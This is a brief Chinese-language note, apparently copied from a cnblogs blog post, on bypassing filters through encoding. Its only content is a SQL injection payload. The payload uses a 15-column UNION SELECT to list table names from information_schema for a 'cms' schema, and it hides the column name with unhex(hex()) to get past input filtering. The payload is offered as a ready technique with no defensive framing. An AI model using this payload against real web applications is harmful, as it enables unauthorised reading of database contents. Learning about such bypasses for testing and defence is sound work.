编码绕过

1.

绕过payload : union select 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema='cms'  采用了16进制编码。

原文地址:https://www.cnblogs.com/pangya/p/8984362.html